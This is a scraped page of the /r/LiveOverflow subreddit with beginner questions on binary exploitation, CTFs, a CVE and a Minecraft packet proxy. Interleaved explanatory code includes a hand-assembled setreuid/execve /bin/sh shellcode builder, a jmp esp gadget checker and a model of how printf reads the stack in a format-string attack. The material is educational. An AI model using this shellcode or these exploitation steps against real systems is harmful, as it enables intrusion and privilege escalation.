/r/LiveOverflow


/r/LiveOverflow is a place to discuss and create live hacking videos, or other content that might be related to CTFs.

Hack the Planet!

Welcome! This subreddit is a place to discuss and create live hacking videos, or other content that might be related to CTFs.

Twitch: LiveOverflow

YouTube: LiveOverflow

Twitter: @LiveOverflow

Website: liveoverflow.com

How to behave?

» be excellent to each other

» help if somebody needs help...

» ... but don't beg for solutions. We will only give you a tip for the right direction

» Follow the rules of the CTFs you are playing - don't spoil challenges

Some additional information:

Excellent Hacking Games:

» io.smashthestack.org (pwn, rev)

» w3challs.com (web, rev, crypto)

» prompt.ml (XSS)

Related subreddits:

» /r/securityCTF

» /r/HowToHack

» /r/netsecstudents

contact me if there are other subreddits that should be listed here

26,783 Subscribers

2

PIE base address leak

Hello,

I have a binary that has PIE, ASLR, NX, full RELRO and no canary. There is a buffer overflow vulnerability, but no format string vulnerability (nothing gets printed with user input). How can I leak the PIE base address?

1 Comment
2024/05/07
17:55 UTC

5

Buffer overflow - jmp esp in libc not jumping

Hello, I am learning about buffer overflows. I have a 32-bit binary. I crafted a payload that overwrites the stack/EIP to go to libc where jmp esp is. According to gdb it jumps to libc, but it segfaults on jmp esp. Why is that?

The stack is executable. ESP points to the NOP sled. Here is more info:

[----------------------------------registers-----------------------------------]
EAX: 0xffffffff
EBX: 0xf7e1dff4 --> 0x21dd8c
ECX: 0x804a07e ("Mail sent\n")
EDX: 0xffffffb8
ESI: 0x804bf04 --> 0x8049200 (<__do_global_dtors_aux>: endbr32)
EDI: 0xf7f7fba0 --> 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffb0d970 --> 0x90909090
EIP: 0xf7c06691 --> 0x761be4ff
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xf7c06691: jmp esp
 | 0xf7c06693: sbb esi,DWORD PTR [esi-0x1b]
 | 0xf7c06696: mov ebx,ebp
 | 0xf7c06698: and bl,bl
 |-> 0xffb0d970: nop
     0xffb0d971: nop
     0xffb0d972: nop
     0xffb0d973: nop
JUMP is taken
[------------------------------------stack-------------------------------------]
0000| 0xffb0d970 --> 0x90909090
0004| 0xffb0d974 --> 0x90909090
0008| 0xffb0d978 --> 0x315e16eb
0012| 0xffb0d97c --> 0x64688c0
0016| 0xffb0d980 --> 0x1e8d27b0
0020| 0xffb0d984 --> 0x1edb966
0024| 0xffb0d988 --> 0x1b080cd
0028| 0xffb0d98c --> 0x80cddb31
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7c06691 in ?? () from /lib32/libc.so.6

Mapped address spaces:
Start Addr End Addr Size Offset Perms objfile
0x8048000 0x8049000 0x1000 0x0 r--p /home/kali/Downloads/binary/test/bin
0x8049000 0x804a000 0x1000 0x1000 r-xp /home/kali/Downloads/binary/test/bin
0x804a000 0x804b000 0x1000 0x2000 r--p /home/kali/Downloads/binary/test/bin
0x804b000 0x804c000 0x1000 0x2000 r--p /home/kali/Downloads/binary/test/bin
0x804c000 0x804d000 0x1000 0x3000 rw-p /home/kali/Downloads/binary/test/bin
0x89d4000 0x89f6000 0x22000 0x0 rw-p [heap]
0xf7c00000 0xf7c22000 0x22000 0x0 r--p /usr/lib32/libc.so.6
0xf7c22000 0xf7d9b000 0x179000 0x22000 r-xp /usr/lib32/libc.so.6
0xf7d9b000 0xf7e1c000 0x81000 0x19b000 r--p /usr/lib32/libc.so.6
0xf7e1c000 0xf7e1e000 0x2000 0x21b000 r--p /usr/lib32/libc.so.6
0xf7e1e000 0xf7e1f000 0x1000 0x21d000 rw-p /usr/lib32/libc.so.6
0xf7e1f000 0xf7e29000 0xa000 0x0 rw-p
0xf7f52000 0xf7f54000 0x2000 0x0 rw-p
0xf7f54000 0xf7f58000 0x4000 0x0 r--p [vvar]
0xf7f58000 0xf7f5a000 0x2000 0x0 r-xp [vdso]
0xf7f5a000 0xf7f5b000 0x1000 0x0 r--p /usr/lib32/ld-linux.so.2
0xf7f5b000 0xf7f7d000 0x22000 0x1000 r-xp /usr/lib32/ld-linux.so.2
0xf7f7d000 0xf7f8b000 0xe000 0x23000 r--p /usr/lib32/ld-linux.so.2
0xf7f8b000 0xf7f8d000 0x2000 0x30000 r--p /usr/lib32/ld-linux.so.2
0xf7f8d000 0xf7f8e000 0x1000 0x32000 rw-p /usr/lib32/ld-linux.so.2
0xffb55000 0xffb76000 0x21000 0x0 rwxp [stack]

2 Comments
2024/05/06
00:11 UTC
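The check a practitioner runs before blaming the gadget: confirm that both the gadget address (EIP) and the jump target (ESP) sit inside mappings that carry the x bit. The script below is an added example, not code from the post; it pastes the post's own "Mapped address spaces" listing in as a constructed sample string (ld-linux, vdso and vvar lines left out for brevity) and also accepts the kernel's /proc/<pid>/maps layout, which is an addition for use on a live process. On the listing exactly as posted, 0xf7c06691 falls in the first libc segment (r--p, no execute bit) and 0xffb0d970 lies below the [stack] mapping; whether that also holds for the run that crashed depends on whether the mappings were captured from the same process, since ASLR re-randomizes them per run.

```python
# Constructed sample: the "Mapped address spaces" listing from the post above.
SAMPLE_MAPS = """\
Start Addr End Addr Size Offset Perms objfile
0x8048000 0x8049000 0x1000 0x0 r--p /home/kali/Downloads/binary/test/bin
0x8049000 0x804a000 0x1000 0x1000 r-xp /home/kali/Downloads/binary/test/bin
0x804a000 0x804b000 0x1000 0x2000 r--p /home/kali/Downloads/binary/test/bin
0x804b000 0x804c000 0x1000 0x2000 r--p /home/kali/Downloads/binary/test/bin
0x804c000 0x804d000 0x1000 0x3000 rw-p /home/kali/Downloads/binary/test/bin
0x89d4000 0x89f6000 0x22000 0x0 rw-p [heap]
0xf7c00000 0xf7c22000 0x22000 0x0 r--p /usr/lib32/libc.so.6
0xf7c22000 0xf7d9b000 0x179000 0x22000 r-xp /usr/lib32/libc.so.6
0xf7d9b000 0xf7e1c000 0x81000 0x19b000 r--p /usr/lib32/libc.so.6
0xf7e1c000 0xf7e1e000 0x2000 0x21b000 r--p /usr/lib32/libc.so.6
0xf7e1e000 0xf7e1f000 0x1000 0x21d000 rw-p /usr/lib32/libc.so.6
0xf7e1f000 0xf7e29000 0xa000 0x0 rw-p
0xffb55000 0xffb76000 0x21000 0x0 rwxp [stack]
"""


def parse_maps(text):
    """Parse mappings into (start, end, perms, name) tuples.

    Accepts the gdb/PEDA 'info proc mappings' layout used in the post
    (start end size offset perms [objfile]) and, as an addition for live use,
    the kernel's /proc/<pid>/maps layout (start-end perms offset dev inode [path]).
    """
    regions = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        if "-" in parts[0]:                      # /proc/<pid>/maps layout
            lo, hi = parts[0].split("-")
            start, end, perms = int(lo, 16), int(hi, 16), parts[1]
        elif parts[0].startswith("0x"):          # gdb layout from the post
            start, end, perms = int(parts[0], 16), int(parts[1], 16), parts[4]
        else:
            continue                             # header line
        name = parts[5] if len(parts) > 5 else ""
        regions.append((start, end, perms, name))
    return regions


def region_of(regions, addr):
    """Return the region containing addr, or None when addr is unmapped."""
    for r in regions:
        if r[0] <= addr < r[1]:
            return r
    return None


def classify(regions, addr):
    """'exec' if addr is mapped with the x bit, 'noexec' if mapped without it, else 'unmapped'."""
    r = region_of(regions, addr)
    if r is None:
        return "unmapped"
    return "exec" if "x" in r[2] else "noexec"


def check_jmp_esp(maps_text, eip, esp):
    """For 'jmp esp' to land in the sled, both the gadget (EIP) and the target (ESP)
    must be executable memory; return the verdict for each."""
    regions = parse_maps(maps_text)
    return {"gadget": classify(regions, eip), "target": classify(regions, esp)}


if __name__ == "__main__":
    # EIP and ESP taken from the register dump in the post.
    print(check_jmp_esp(SAMPLE_MAPS, eip=0xf7c06691, esp=0xffb0d970))
```

On a live target the same check is `check_jmp_esp(open(f"/proc/{pid}/maps").read(), eip, esp)` from a second terminal while the process sits at the breakpoint; searching the whole library for a `jmp esp` byte pattern (ff e4) will happily find one in a read-only segment, so filter gadget hits by segment permissions first.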

7

Minecraft:HACKED like Server

It looks like the server which liveoverflow hosted for the series is offline (after masscanning). Does anyone maybe know another server which provides HACKED like challenges?

0 Comments
2024/04/25
09:57 UTC

4

Trying to understand format strings vuln...arguments going to the stack in reverse order means...

Hey there! Question: so I'm reading HTAoE and of course I'm stuck on format strings. There are a few typos and lapses in clarity that make this particular section very challenging to newcomers. Anyway, I'm curious about something.

The book towards the beginning mentions that the arguments are pushed to the stack in reverse order (not sure if the architecture makes a difference, but it's the x86 Unix world; Ubuntu kernel 2.6.20-15 in case it matters).

Anyways, what's confusing me is the nature of the random reads of memory addresses from the printf function.

Yes, yes, I get it - it's reading from an address located at EBP + [something] as it's an argument...

Aaand, because printf is a function, it's reading from an older (aka earlier / more senior stack frame). However, does this mean that even though arguments are pushed in reverse order to the stack, the argument increment is lower?

For example, let's say you're pushing 3 kids to the stack:

printf("Hello kids! Get on the stack %s! You too %s! And don't try to hide %s!\n", &OldestKid, &MiddleChild, &YoungestKid)

Does this mean that if we opened this with GDB, we'd be looking at something like this?:

[EBP + 12] //OldestKid
[EBP + 8] //MiddleChild
[EBP + 4] //YoungestKid

(with the first argument having the highest ebp increment?)

I ask because it's a bit confusing to understand why specifically some arguments are reading sooome values arbitrarily on the stack....

Anyways, I appreciate your patience with me. Please explain it to me as a child if you can - for myself and potentially others that come across it. Resources are also welcome!

7 Comments
2024/04/09
04:48 UTC
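An added model, not from the post or the book, of the frame the question is about. In 32-bit cdecl the arguments are pushed right to left, which puts the first argument at the lowest address, directly above the format-string pointer at [ebp+8]: the first conversion reads [ebp+12] (OldestKid), the next [ebp+16], and every conversion beyond the supplied arguments keeps walking upward into the caller's frame, which is where the "arbitrary" values come from. The frame contents below are constructed, not a real dump. On x86-64 the first six integer arguments travel in registers and only the seventh onward is on the stack, so the offsets differ there.

```python
# Constructed model of the 32-bit cdecl stack frame printf sees for
#     printf("... %s ... %s ... %s", &OldestKid, &MiddleChild, &YoungestKid);
# after "push ebp; mov ebp, esp".  One entry per 4-byte word, low address first.
# YoungestKid is pushed first (highest address); OldestKid is pushed last and sits
# right above the format-string pointer.
SAVED_EBP, RET_ADDR, FMT_PTR, ARG1, ARG2, ARG3 = range(6)
FRAME = [
    0xbffff7f8,  # [ebp+0]  caller's saved EBP
    0x08048456,  # [ebp+4]  return address into the caller
    0x08048600,  # [ebp+8]  fmt pointer: the "0th" argument
    0x0000000a,  # [ebp+12] &OldestKid   (first argument, pushed last)
    0x0000000b,  # [ebp+16] &MiddleChild
    0x0000000c,  # [ebp+20] &YoungestKid (third argument, pushed first)
    0x41414141,  # [ebp+24] the caller's own locals start here (e.g. the input buffer)
    0x42424242,  # [ebp+28]
]


def ebp_offset(slot):
    """Byte offset of a frame slot from printf's EBP."""
    return 4 * slot


def model_printf_reads(fmt, frame=FRAME):
    """Return [(ebp_offset, word)] for each conversion in fmt, in the order a cdecl
    printf fetches them.  Sequential conversions (%x, %p, %s, ...) take the next
    word upward from [ebp+12]; positional ones (%N$x) take argument N.  Only the
    fetch is modelled, not the formatting.  Raises IndexError when a read runs off
    the end of the constructed frame."""
    reads = []
    next_slot = ARG1
    i = 0
    while i < len(fmt):
        if fmt[i] != "%":
            i += 1
            continue
        i += 1
        if i < len(fmt) and fmt[i] == "%":          # "%%": literal percent, no fetch
            i += 1
            continue
        j = i
        while j < len(fmt) and fmt[j].isdigit():
            j += 1
        if j > i and j < len(fmt) and fmt[j] == "$":  # positional %N$...
            slot = ARG1 + int(fmt[i:j]) - 1
            i = j + 1
        else:                                         # sequential: next argument
            slot = next_slot
            next_slot += 1
        while i < len(fmt) and not fmt[i].isalpha():  # skip flags/width/precision
            i += 1
        i += 1                                        # skip the conversion letter
        reads.append((ebp_offset(slot), frame[slot]))
    return reads


if __name__ == "__main__":
    for off, word in model_printf_reads("%x %x %x %x"):
        print(f"[ebp+{off}] -> {word:#010x}")
```

Run with "%x %x %x %x" the fourth read lands on 0x41414141, the first word of the caller's locals; that is exactly the mechanism a format-string attack uses to reach a buffer the attacker controls.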

0

Can You Hide Rickroll Inside A Text?

1 Comment
2024/04/07
22:37 UTC

6

Where to start at crypto ctfs?

I started diving into CTFs with LiveOverflow’s binary exploitation tutorials, which taught me a lot. I also delved into web security through web CTFs. However, I’ve always tended to skip the crypto challenges because they seemed impossible to me, aside from some basic knowledge in Vigenère and XOR. Can anyone recommend good resources for learning cryptography? How did you become good in crypto CTFs?

2 Comments
2024/04/02
19:51 UTC

5

Trying to understand CVE-2023-3824

I recently came across CVE-2023-3824, which has been rated as critical with a score of 9.8. This vulnerability constitutes a Remote Code Execution (RCE) and does not require any user interaction. The description for this CVE is as follows:

"In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading a phar file and reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, potentially resulting in memory corruption or RCE."

Now, my question is: how can an HTTP request sent to a website or web server trigger the loading of a phar file and cause this vulnerability? Should there be a specific portion of the code that allows this vulnerability to occur? I'm curious because this bug's presence led to the downfall of the largest ransomware gang.

Additionally, there was a GitHub issue that further confused me. Here is the link for reference:
Git issue
NVD post

2 Comments
2024/03/18
17:27 UTC

1

Return Oriented Programming Buffer Overflow Part 1 - In Lab Exercise

Tried exploiting a ROP-based buffer overflow. It was indeed a great learning curve. Check out https://vandanpathak.com/kernels-and-buffers/return-oriented-programming-buffer-overflow-part-1/

0 Comments
2024/03/18
06:28 UTC

4

Binary exploitation 0x0D, stack3 protostar. Can't set the memory address, it's glitching

0 Comments
2024/03/13
06:02 UTC

2

Create a shellcode that executes a shell as root

I'm watching this video: https://www.youtube.com/watch?v=1S0aBV-Waeo, and trying to perform a buffer overflow attack on the same program as shown in the video. The problem is I'm not finding a shellcode that runs a shell as root. I copied and tried to run the same shellcode shown in the video, and also a couple of shellcodes from this website: https://shell-storm.org/shellcode/index.html, but the result is the same: process 48506 is executing new program: /usr/bin/bash. Can someone point me to some shellcode that will run a shell as root, or any material regarding this issue? And does anyone know if Linux has some sort of defense mechanism that forbids code running in normal user space from running root terminals? Some info about my system: I'm on a Linux machine, my program is 32-bit, and I've disabled ASLR and compiled with -fno-stack-protector, -no-pie and -z execstack.

1 Comment
2024/03/06
17:28 UTC
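An added example, not from the post or the video, of the usual shape of "root shell" shellcode for 32-bit Linux, assembled by hand from instruction encodings and checked for bytes that break a string copy. The shellcode cannot grant privileges: the spawned shell inherits whatever effective uid the exploited process already has, so it only comes up as root when the target is running as root or is setuid-root. The setreuid(0, 0) prefix exists because a shell that notices euid != ruid may drop back to the real uid (bash does this unless started with -p; dash, Debian's /bin/sh, does not), so the classic shellcode makes both uids 0 first and then executes /bin/sh rather than bash.

```python
# 32-bit Linux x86 shellcode assembled by hand: (bytes, assembly) per instruction.
# Syscall numbers are the i386 ABI values: setreuid = 70, execve = 11.
SETREUID_PREFIX = [
    (b"\x31\xc0", "xor eax, eax"),
    (b"\x31\xdb", "xor ebx, ebx        ; ruid = 0"),
    (b"\x31\xc9", "xor ecx, ecx        ; euid = 0"),
    (b"\xb0\x46", "mov al, 70          ; __NR_setreuid"),
    (b"\xcd\x80", "int 0x80"),
]
EXECVE_SH = [
    (b"\x31\xc0", "xor eax, eax"),
    (b"\x50",     "push eax            ; NUL terminator for the path"),
    (b"\x68//sh", "push 0x68732f2f     ; \"//sh\""),
    (b"\x68/bin", "push 0x6e69622f     ; \"/bin\""),
    (b"\x89\xe3", "mov ebx, esp        ; ebx -> \"/bin//sh\""),
    (b"\x50",     "push eax            ; argv[1] = NULL"),
    (b"\x53",     "push ebx            ; argv[0] = path"),
    (b"\x89\xe1", "mov ecx, esp        ; ecx -> argv"),
    (b"\x31\xd2", "xor edx, edx        ; envp = NULL"),
    (b"\xb0\x0b", "mov al, 11          ; __NR_execve"),
    (b"\xcd\x80", "int 0x80"),
]


def build_shellcode(with_setreuid=True):
    """Concatenate the instruction bytes; with_setreuid=False gives plain execve("/bin//sh")."""
    parts = (SETREUID_PREFIX if with_setreuid else []) + EXECVE_SH
    return b"".join(code for code, _ in parts)


def check_shellcode(sc, forbidden=b"\x00\x0a"):
    """Return the set of forbidden bytes present in sc.  An empty set means the
    payload survives strcpy/gets-style copies, which stop at NUL or newline."""
    return {bytes([b]) for b in sc if b in forbidden}


def listing(parts):
    """Human-readable byte/assembly listing, for comparing against a disassembler."""
    return "\n".join(f"{code.hex():<12} {asm}" for code, asm in parts)


if __name__ == "__main__":
    sc = build_shellcode()
    print(listing(SETREUID_PREFIX + EXECVE_SH))
    print(f"{len(sc)} bytes, forbidden bytes present: {check_shellcode(sc) or 'none'}")
```

The 32-bit setreuid syscall takes 16-bit uids, which is fine for uid 0; a real-world variant would use setreuid32 (203) for larger ids. To confirm the encodings independently, feed `listing(...)` side by side with `objdump -D -b binary -m i386` over the raw bytes.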

1

Cannot keep shell open after a buffer overflow

I was watching this video: https://www.youtube.com/watch?v=HSlhY4Uy8SA&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=15, and tried to do something similar, but I'm facing the problem of keeping my shell alive after the execution. A detailed explanation can be found here: https://unix.stackexchange.com/questions/771625/how-to-keep-a-shell-alive-after-it-gets-started-from-inside-a-program?noredirect=1#comment1473006_771625

0 Comments
2024/03/06
08:26 UTC

2

Bug bounty enthusiast

Hello all, I am new to bug bounty hunting and I want to learn about this field. I am a person who likes to learn with actual problems, not just read or watch tutorials. So my question is, where can I find a website or even a place that offers money for finding bugs (web, similar to https://bughunters.google.com/)?

1 Comment
2024/02/20
02:05 UTC

2

Android pentesting

Is there any way to proxy MQTT communication just like we do for HTTP traffic in Burp Suite? If not, what are the other tools and ways to achieve that?

3 Comments
2024/02/14
18:48 UTC

1

a question regarding WinRAR RAR archives

I have a question regarding WinRAR RAR archives. I recently came across a password-encrypted archive (file.rar), and I'm curious to know if there's a way to determine the specific version of the software that was used to create it.
Thanks.

1 Comment
2024/02/12
14:33 UTC

3

Questions Regarding Minecraft Proxy

I figured I'd ask this question here since a lot of people in the Minecraft proxy scene know LiveOverflow because of his Minecraft:HACKED series.

I'm trying to make a Minecraft proxy so I can intercept packets, change them, drop them and create new packets. My requirement is also that the program can run on a server in online mode. I've tried to run the code from LiveOverflow's first video in the series, which can be found here: https://github.com/LiveOverflow/minecraft-hacked/blob/main/01_protocol_proxy/teleport_proxy.py

The code is as follows:

from twisted.internet import reactor
from quarry.net.proxy import DownstreamFactory, Bridge
import struct
import time
import random
import math

# based on https://github.com/barneygale/quarry/blob/master/examples/client_chat_logger.py

class QuietBridge(Bridge):
    entity_id = None
    prev_pos = None
    prev_look = None

    def packet_upstream_chat_message(self, buff):
        buff.save()
        chat_message = buff.unpack_string()
        print(f" >> {chat_message}")

        if chat_message.startswith("/port"):
            _, distance = chat_message.split(" ")
            flags = 0
            teleport = 0
            dismount = 0
            x, y, z, ground = self.prev_pos
            yaw, pitch, ground = self.prev_look
            # see net.minecraft.entity.Entity:getRotationVEctor()
            f = pitch * 0.017453292
            g = -yaw * 0.017453292
            h = math.cos(g)
            i = math.sin(g)
            j = math.cos(f)
            k = math.sin(f)
            _x = i*j
            _y = -k
            _z = h*j
            x += _x * float(distance)
            y += _y * float(distance)
            z += _z * float(distance)
            buf = struct.pack('>dddffBBB', x, y, z, yaw, pitch, flags, teleport, dismount)
            self.downstream.send_packet('player_position_and_look', buf)

        buff.restore()
        self.upstream.send_packet("chat_message", buff.read())

    def packet_unhandled(self, buff, direction, name):
        print(f"[*][{direction}] {name}")
        if direction == "downstream":
            self.downstream.send_packet(name, buff.read())
        elif direction == "upstream":
            self.upstream.send_packet(name, buff.read())

    def packet_upstream_player_position(self, buff):
        buff.save()
        x, y, z, ground = struct.unpack('>dddB', buff.read())
        print(f"[*] player_position {x} / {y} / {z} | {ground}")
        self.prev_pos = (x, y, z, ground)
        buf = struct.pack('>dddB', x, y, z, ground)
        self.upstream.send_packet('player_position', buf)

    def packet_upstream_player_look(self, buff):
        buff.save()
        yaw, pitch, ground = struct.unpack('>ffB', buff.read())
        print(f"[*] player_look {yaw} / {pitch} | {ground}")
        self.prev_look = (yaw, pitch, ground)
        buf = struct.pack('>ffB', yaw, pitch, ground)
        self.upstream.send_packet('player_look', buf)


class QuietDownstreamFactory(DownstreamFactory):
    bridge_class = QuietBridge
    motd = "LiveOverflow Proxy"


# python basic_proxy.py -q 12345
def main(argv):
    # Parse options
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("-a", "--listen-host", default="0.0.0.0", help="address to listen on")
    parser.add_argument("-p", "--listen-port", default=55555, type=int, help="port to listen on")
    parser.add_argument("-b", "--connect-host", default="127.0.0.1", help="address to connect to")
    parser.add_argument("-q", "--connect-port", default=25565, type=int, help="port to connect to")
    args = parser.parse_args(argv)

    # Create factory
    factory = QuietDownstreamFactory()
    factory.connect_host = args.connect_host
    factory.connect_port = args.connect_port

    # Listen
    factory.listen(args.listen_host, args.listen_port)
    reactor.run()


if __name__ == "__main__":
    import sys
    main(sys.argv[1:])

Note that my server runs on port 25565 and that I am trying to connect to the server via the server address localhost:55555 in my Minecraft client.

When I run this code and join my local server it gives the error:

Auth failed: [<twisted.python.failure.Failure OpenSSL.SSL.Error: [('system library', '', ''), ('STORE routines', '', 'unsupported'), ('system library', '', ''), ('STORE routines', '', 'unsupported'), ('system library', '', ''), ('STORE routines', '', 'unsupported'), ('system library', '', ''), ('STORE routines', '', 'unsupported'), ('SSL routines', '', 'certificate verify failed')]>]

I have found numerous people saying it has something to do with Windows and OpenSSL, and others claiming it is a problem with Microsoft authentication since quarry still tries to log in using only your Mojang credentials.

Does anyone know any solutions?

I have only got a proxy working using this: https://github.com/TheStaticTurtle/MineProxy. The problem is that this code is so segmented and overall huge that I just can't find any packet to modify or do anything with. The code just works as a proxy, but I can't do anything more with it.

0 Comments
2024/02/11
16:53 UTC

4

Help with pwnable.tw orw challenge

I've been working on this challenge for about 5 hours. I know what I'm supposed to do, but I'm having problems with a strange null byte that appears at the start of the address that the shellcode gets injected into. When attempting to inject my shellcode, it changes the first few bytes to an instruction that crashes the program. I have found that with certain inputs the null byte is overwritten by the input, but I cannot figure out what causes it to get overwritten. I looked at a few writeups, and none of them mention the null byte. Thanks!

https://preview.redd.it/sob6zgis2oec1.png?width=815&format=png&auto=webp&s=ad76c217045e78cc3acc0adbee241d0c8be91859

1 Comment
2024/01/25
23:04 UTC

1

Help to implement reed solomon decoding in HP Smart Array RAID controller

Hello there!
I am making a program to read data via software from a RAID array created with an HP Smart Array Controller. In fact I have already implemented reading RAID 0, RAID 1, RAID 5 (able to read with 1 missing drive) and RAID 6 (able to read with 1 missing drive). What's left is RAID 6 able to read with 2 missing drives, and I am stuck. I can't figure out how this controller has implemented Reed-Solomon encoding, because I know only basic math. I found some resources on the internet explaining how it works in simple language, but they do not work for this controller. I checked that I am doing everything correctly by trying it on Linux MD RAID, and it is correct; this controller just has a different implementation. I created 2 arrays, 4-drive and 5-drive, added data from 0x00 to 0xff to create many combinations, and dumped one stripe of each drive here with the description -> https://github.com/ScuroGuardiano/SmartArrayReader/tree/master/raid-6-problem
I would be really thankful if someone could help me with this; I just don't have the mathematical knowledge to figure it out. I am asking here because I know you guys do a lot of reverse engineering, so maybe someone would be able to figure it out. Have a great day or night! 🙏

0 Comments
2024/01/12
00:16 UTC
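For readers who want the reference computation the post says it verified against Linux MD: the block below is an added example, not the poster's code and not the HP Smart Array layout the post is asking about. It implements the standard RAID-6 arithmetic in GF(2^8) with the polynomial 0x11d and generator 2 (the scheme described in H. Peter Anvin's "The mathematics of RAID-6"): P is the XOR of the data drives, Q is the sum of g^i times drive i, and two lost data drives are recovered by folding the survivors into P and Q and solving the resulting two-by-two system. The drive contents are constructed test data, not the dumps from the linked repository. A controller that uses a different field polynomial, a different generator, a different drive-to-coefficient assignment, or rotates P/Q across stripes will produce different Q bytes from the same data, which is where a dump of known data per drive, as the post provides, lets one test each hypothesis in turn.

```python
# Standard RAID-6 (Linux MD style) P/Q computation and two-data-drive recovery.
POLY = 0x11D                      # x^8 + x^4 + x^3 + x^2 + 1, generator g = 2
EXP = [0] * 512                   # EXP[i] = g^i, doubled so LOG sums never wrap
LOG = [0] * 256
_x = 1
for _i in range(255):
    EXP[_i] = _x
    LOG[_x] = _i
    _x <<= 1
    if _x & 0x100:
        _x ^= POLY
for _i in range(255, 512):
    EXP[_i] = EXP[_i - 255]


def gf_mul(a, b):
    if a == 0 or b == 0:
        return 0
    return EXP[LOG[a] + LOG[b]]


def gf_div(a, b):
    if b == 0:
        raise ZeroDivisionError("division by zero in GF(2^8)")
    if a == 0:
        return 0
    return EXP[(LOG[a] - LOG[b]) % 255]


def compute_pq(data):
    """data: one equal-length bytes object per data drive, in drive order.
    P = XOR of all drives; Q = XOR over i of g^i * D_i."""
    n = len(data[0])
    P, Q = bytearray(n), bytearray(n)
    for i, d in enumerate(data):
        g_i = EXP[i]
        for k in range(n):
            P[k] ^= d[k]
            Q[k] ^= gf_mul(g_i, d[k])
    return bytes(P), bytes(Q)


def recover_two_data(data, x, y, P, Q):
    """data has None at indices x and y (two missing data drives).  With the
    surviving drives folded out of P and Q we are left with
        Pxy = Dx ^ Dy,          Qxy = g^x*Dx ^ g^y*Dy
    hence Dx = (Qxy ^ g^y*Pxy) / (g^x ^ g^y)  and  Dy = Dx ^ Pxy."""
    n = len(P)
    Pxy, Qxy = bytearray(P), bytearray(Q)
    for i, d in enumerate(data):
        if d is None:
            continue
        g_i = EXP[i]
        for k in range(n):
            Pxy[k] ^= d[k]
            Qxy[k] ^= gf_mul(g_i, d[k])
    denom = EXP[x] ^ EXP[y]                       # nonzero whenever x != y
    Dx, Dy = bytearray(n), bytearray(n)
    for k in range(n):
        Dx[k] = gf_div(Qxy[k] ^ gf_mul(EXP[y], Pxy[k]), denom)
        Dy[k] = Dx[k] ^ Pxy[k]
    out = list(data)
    out[x], out[y] = bytes(Dx), bytes(Dy)
    return out


if __name__ == "__main__":
    # Constructed 4-drive stripe: every byte value appears, like the post's 0x00..0xff fill.
    drives = [bytes((37 * i + k) & 0xFF for k in range(256)) for i in range(4)]
    P, Q = compute_pq(drives)
    damaged = list(drives)
    damaged[1] = damaged[3] = None
    print("recovered OK:", recover_two_data(damaged, 1, 3, P, Q) == drives)
```

When testing a controller's dump against this code, compare Q byte by byte: if P matches but Q does not, try the other common polynomial (0x187) and a reversed drive order before assuming a non-standard scheme.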

3

Roadmap & Book recommendations

Hey, I don't want to bore you guys with too much nonsense, but I have some questions about my roadmap.

So currently I'm a dev. I can use any programming language with ease, and I also know assembly and can interact with the Windows API from x86 assembly.

I feel confident with assembly.

  1. Currently at the 8th chapter of Kip R. Irvine's book "Assembly Language for x86 Processors" (this book taught me how to code in asm).
  2. I will finish this book and jump into the book "Bryant & O'Hallaron: Computer Systems: A Programmer's Perspective".
  3. From there I'm planning to jump into "Operating Systems: Three Easy Pieces".
  4. I have no clue where to jump from here. Maybe "Pavel Yosifovich, Windows Internals Part 1", or should I just start reverse engineering with "Reversing: Secrets of Reverse Engineering" & "Practical Reverse Engineering" by Bruce Dang (both books are very good from the peek I took)?

So my question is this. My DSA background is pretty basic. Also my cryptography background goes no further than the Caesar cipher, XORing and the generally used libs for encryption. Also, when I start my journey with reverse engineering I'm planning to do at least 500 crackme challenges to get a really good grip. Then go with kernel exploits, buffer overflows, RCE attacks....

What do I miss out on? this is the roadmap I have in my mind.

2 Comments
2024/01/08
20:40 UTC

0

What should I start with in order to learn this stuff?

I'm completely new to this stuff.

8 Comments
2024/01/02
07:04 UTC

0

3v3 r"+and r ftgt/6ftt t t6f/t6f6fttttft trt t/ t t 6g TV vÿ

1 Comment
2024/01/01
16:23 UTC

42

A Vulnerability to Hack The World - CVE-2023-4863

1 Comment
2023/12/21
16:04 UTC

3

(How) can I use masscan in a python project on windows?

1 Comment
2023/12/08
21:03 UTC

5

What are some best resources for noobies/script kiddies to learn pentesting

I completed CompTIA Network+ and am currently doing CCNA 200-301. I tried TryHackMe and it feels good, but it's not free, so I was looking for some other alternatives with the best paths to follow to reach the goal.

5 Comments
2023/12/01
18:55 UTC

6

Is the MC server still up?

Hi, I started my own scanning project, and was wondering if the MC server was still up or not?

2 Comments
2023/11/27
14:42 UTC

4

pci leetch

0 Comments
2023/11/27
09:24 UTC
